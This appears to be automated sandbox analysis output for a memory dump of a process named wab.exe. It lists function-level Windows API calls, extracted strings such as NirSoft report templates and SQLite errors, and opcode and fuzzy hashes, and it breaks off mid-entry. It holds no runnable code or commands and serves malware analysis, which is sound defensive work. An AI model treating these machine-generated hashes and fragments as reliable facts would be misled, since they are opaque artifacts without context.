                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$_snwprintf
                                    • String ID: %%0.%df
                                    • API String ID: 3473751417-763548558
                                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                    APIs
                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                    • GetTickCount.KERNEL32 ref: 0040610B
                                    • GetParent.USER32(?), ref: 00406136
                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                    • String ID: A
                                    • API String ID: 2892645895-3554254475
                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                    APIs
                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                    • memset.MSVCRT ref: 0040DA23
                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                    • String ID: caption
                                    • API String ID: 973020956-4135340389
                                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                    APIs
                                    Strings
                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$_snwprintf$wcscpy
                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                    • API String ID: 1283228442-2366825230
                                    • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                    • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                    APIs
                                    • wcschr.MSVCRT ref: 00413972
                                    • wcscpy.MSVCRT ref: 00413982
                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                    • wcscpy.MSVCRT ref: 004139D1
                                    • wcscat.MSVCRT ref: 004139DC
                                    • memset.MSVCRT ref: 004139B8
                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                    • memset.MSVCRT ref: 00413A00
                                    • memcpy.MSVCRT ref: 00413A1B
                                    • wcscat.MSVCRT ref: 00413A27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                    • String ID: \systemroot
                                    • API String ID: 4173585201-1821301763
                                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: wcscpy
                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                    • API String ID: 1284135714-318151290
                                    • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                    • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                    • String ID: 0$6
                                    • API String ID: 4066108131-3849865405
                                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                    APIs
                                    • memset.MSVCRT ref: 004082EF
                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                    • memset.MSVCRT ref: 00408362
                                    • memset.MSVCRT ref: 00408377
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$ByteCharMultiWide
                                    • String ID:
                                    • API String ID: 290601579-0
                                    • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                    • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy$memchrmemset
                                    • String ID: PD$PD
                                    • API String ID: 1581201632-2312785699
                                    • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                    • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                    APIs
                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                    • GetDC.USER32(00000000), ref: 00409F6E
                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                    • GetParent.USER32(?), ref: 00409FA5
                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                    • String ID:
                                    • API String ID: 2163313125-0
                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@$wcslen
                                    • String ID:
                                    • API String ID: 239872665-3916222277
                                    • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                    • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpywcslen$_snwprintfmemset
                                    • String ID: %s (%s)$YV@
                                    • API String ID: 3979103747-598926743
                                    • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                    • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                    APIs
                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                    • wcslen.MSVCRT ref: 0040A6B1
                                    • wcscpy.MSVCRT ref: 0040A6C1
                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                    • wcscpy.MSVCRT ref: 0040A6DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                    • String ID: Unknown Error$netmsg.dll
                                    • API String ID: 2767993716-572158859
                                    • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                    • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                    APIs
                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                    • wcscpy.MSVCRT ref: 0040DAFB
                                    • wcscpy.MSVCRT ref: 0040DB0B
                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                    • API String ID: 3176057301-2039793938
                                    • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                    • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                    APIs
                                    Strings
                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                    • out of memory, xrefs: 0042F865
                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                    • too many attached databases - max %d, xrefs: 0042F64D
                                    • database %s is already in use, xrefs: 0042F6C5
                                    • unable to open database: %s, xrefs: 0042F84E
                                    • database is already attached, xrefs: 0042F721
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpymemset
                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                    • API String ID: 1297977491-2001300268
                                    • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                    • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                    APIs
                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                    • memcpy.MSVCRT ref: 0040EB80
                                    • memcpy.MSVCRT ref: 0040EB94
                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                    • String ID: ($d
                                    • API String ID: 1140211610-1915259565
                                    • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                    • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                    APIs
                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                    • GetLastError.KERNEL32 ref: 004178FB
                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$ErrorLastLockSleepUnlock
                                    • String ID:
                                    • API String ID: 3015003838-0
                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                    APIs
                                    • memset.MSVCRT ref: 00407E44
                                    • memset.MSVCRT ref: 00407E5B
                                    • _mbscpy.MSVCRT ref: 00407E7E
                                    • _mbscpy.MSVCRT ref: 00407ED7
                                    • _mbscpy.MSVCRT ref: 00407EEE
                                    • _mbscpy.MSVCRT ref: 00407F01
                                    • wcscpy.MSVCRT ref: 00407F10
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                    • String ID:
                                    • API String ID: 59245283-0
                                    • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                    • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                    APIs
                                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                    • GetLastError.KERNEL32 ref: 0041855C
                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                    • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                    • GetLastError.KERNEL32 ref: 0041858E
                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                    • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                    • String ID:
                                    • API String ID: 3467550082-0
                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                    • API String ID: 3510742995-3273207271
                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                    • memset.MSVCRT ref: 00413ADC
                                    • memset.MSVCRT ref: 00413AEC
                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                    • memset.MSVCRT ref: 00413BD7
                                    • wcscpy.MSVCRT ref: 00413BF8
                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                    • String ID: 3A
                                    • API String ID: 3300951397-293699754
                                    • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                    • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                    • wcscpy.MSVCRT ref: 0040D1B5
                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                    • wcslen.MSVCRT ref: 0040D1D3
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                    • memcpy.MSVCRT ref: 0040D24C
                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                    • String ID: strings
                                    • API String ID: 3166385802-3030018805
                                    • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
